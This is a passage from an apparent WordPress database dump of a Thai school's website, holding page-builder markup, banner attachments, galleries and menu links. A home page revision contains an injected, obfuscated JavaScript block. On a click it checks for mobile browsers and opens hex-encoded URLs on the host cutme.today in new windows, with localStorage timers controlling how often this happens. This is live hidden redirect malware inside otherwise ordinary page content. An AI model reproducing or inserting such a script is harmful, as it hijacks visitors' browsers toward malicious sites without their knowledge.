-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2F61565350226486%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2025-09-11 14:31:24','2025-09-11 07:31:24','',14,'http://pakhaeng.ssk.in.th/?p=2036',0,'revision','',0),
(2038,1,'2025-09-11 14:34:18','2025-09-11 07:34:18','','Blue and Yellow Geometric Welcome Messages and Announcement High School Back to School Banner','','inherit','','closed','','blue-and-yellow-geometric-welcome-messages-and-announcement-high-school-back-to-school-banner-3','','','2025-09-11 14:34:18','2025-09-11 07:34:18','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-2.png',0,'attachment','image/png',0),
(2039,1,'2025-09-11 14:41:03','2025-09-11 07:41:03','','สีส้ม สีน้ำเงิน ทางการ รับสมัครนักเรียน ป้าย แบนเนอร์ (1)','','inherit','','closed','','%e0%b8%aa%e0%b8%b5%e0%b8%aa%e0%b9%89%e0%b8%a1-%e0%b8%aa%e0%b8%b5%e0%b8%99%e0%b9%89%e0%b8%b3%e0%b9%80%e0%b8%87%e0%b8%b4%e0%b8%99-%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3-%e0%b8%a3','','','2025-09-11 14:41:03','2025-09-11 07:41:03','',14,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1.png',0,'attachment','image/png',0),
(2040,1,'2025-09-11 14:41:20','2025-09-11 07:41:20','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_e96e1d-10\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_cddd30-7b\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_cddd30-7b\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"9f7ee323\",\"isDynamic\":true,\"blockVersion\":4} /-->\n\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_1e35ff-0d\",\"ids\":[2026,2039],\"type\":\"slider\",\"imagesDynamic\":[{\"id\":2026,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2026\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner-1024x410.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/Blue-and-Yellow-Geometric-Welcome-Messages-and-Announcement-High-School-Back-to-School-Banner.png\",\"width\":1024,\"height\":410},{\"id\":2039,\"link\":\"http://pakhaeng.ssk.in.th/?attachment_id=2039\",\"alt\":\"\",\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-1024x512.png\",\"lightUrl\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/09/สีส้ม-สีน้ำเงิน-ทางการ-รับสมัครนักเรียน-ป้าย-แบนเนอร์-1-scaled.png\",\"width\":750,\"height\":375}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_386744-46\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=1523\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_3c234c-51\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_3c234c-51\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_bead82-d8\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_941599-c9\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_941599-c9 kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_67d38e-c6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_67d38e-c6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_4b01f7-65\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_4b01f7-65\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_61e97e-78\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_61e97e-78\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_0f2844-d8\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_0f2844-d8\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_cba4c7-2c\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_cba4c7-2c\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_bf6039-24\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_bf6039-24\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_d4f0fe-83\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap 